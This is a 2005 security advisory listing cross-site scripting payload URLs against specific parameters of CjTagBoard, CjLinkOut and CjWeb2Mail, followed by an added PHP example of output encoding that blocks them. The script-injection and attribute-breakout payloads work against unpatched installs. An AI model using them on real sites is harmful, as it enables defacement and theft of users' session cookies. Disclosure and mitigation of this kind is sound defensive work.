cjXSS.txt

13 Sep 2005. Reported by Psymera. Type: packetstorm. Source: packetstormsecurity.com

CjTagBoard 3.0, CjLinkOut 1.0, CjWeb2Mail 3.0 - PHP - Cross Site Scripting - Low Risk - Remote Exploitatio

Code
`######################################################################  
[Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0  
######################################################################  
  
Software: CjTagBoard  
CjLinkOut  
CjWeb2Mail  
  
Versions: CjTagBoard =3.0  
CjLinkOut =1.0  
CjWeb2Mail =3.0  
  
Language: PHP  
  
Type: Cross Site Scripting  
  
Risk: Low  
  
Examples: A] CjTagBoard XSS  
B] CjLinkOut XSS  
C] CjWeb2Mail XSS  
  
Exploitation: remote  
  
Date: 07 Sep 2005  
  
Vendor: Cj Design  
Page: http://www.cj-design.com/  
  
Author: Psymera  
e-mail: [email protected]  
  
######################################################################  
  
-----------------  
A] CjTagBoard XSS  
-----------------  
http://[target]/[folder]/details.php?date=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/details.php?time=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/details.php?name=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/details.php?ip=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/details.php?agent=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/display.php?msg=<h1>DEFACED</h1><script>alert(document.cookie);</script>  
  
----------------  
B] CjLinkOut XSS  
----------------  
http://[target]/[folder]/top.php?123="><h1>hola</h1><script>alert(document.cookie);</script><  
  
-----------------  
C] CjWeb2Mail XSS  
-----------------  
http://[target]/[folder]/thankyou.php?name=<h1>Defaced</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/thankyou.php?sent=1&name=<h1>Defaced</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/thankyou.php?sent=1&message=<h1>Defaced</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=<h1>deface</h1><script>alert(document.cookie);</script>  
http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=<h1>Deface</h1><script>alert(document.cookie);</script>  
  
#######################################################################  
  
`
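
Every test string in the advisory is a request parameter echoed back into the page as markup, and the section B string additionally starts with `">` to close a quoted attribute. The following is an added example, not vendor code and not part of the advisory, showing output encoding for both contexts in PHP 7 or later; the function names, the hidden-field markup and the `ref` field name are hypothetical.

```php
<?php
// Added example: hypothetical stand-in for a page such as details.php.
// It is not the vendor's code; only the parameter names come from the advisory.

/** Encode a value for HTML text or for a quoted attribute value. */
function e($value): string
{
    // A client can send name[]=..., which arrives as an array; render nothing.
    if (!is_string($value)) {
        return '';
    }
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Element-content context: the parameters listed in section A. */
function render_details(array $query): string
{
    $fields = ['date', 'time', 'name', 'ip', 'agent'];
    $rows = '';
    foreach ($fields as $field) {
        $rows .= '<tr><th>' . e($field) . '</th><td>'
               . e($query[$field] ?? '') . "</td></tr>\n";
    }
    return "<table>\n" . $rows . "</table>\n";
}

/** Quoted-attribute context, the case the section B string targets. */
function render_hidden(string $name, $value): string
{
    return '<input type="hidden" name="' . e($name)
         . '" value="' . e($value) . '">';
}

// Constructed sample input that mirrors the advisory's test strings.
$sample = [
    'name'  => '<h1>DEFACED</h1><script>alert(document.cookie);</script>',
    'agent' => '"><h1>hola</h1>',
];

// Declare the charset so the browser decodes the page the way it was encoded.
header('Content-Type: text/html; charset=UTF-8');
echo render_details($sample);
echo render_hidden('ref', $sample['agent']), "\n";
```

With the encoding applied, the sample values appear in the response as literal text (`&lt;h1&gt;`, `&quot;&gt;`) rather than as markup.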
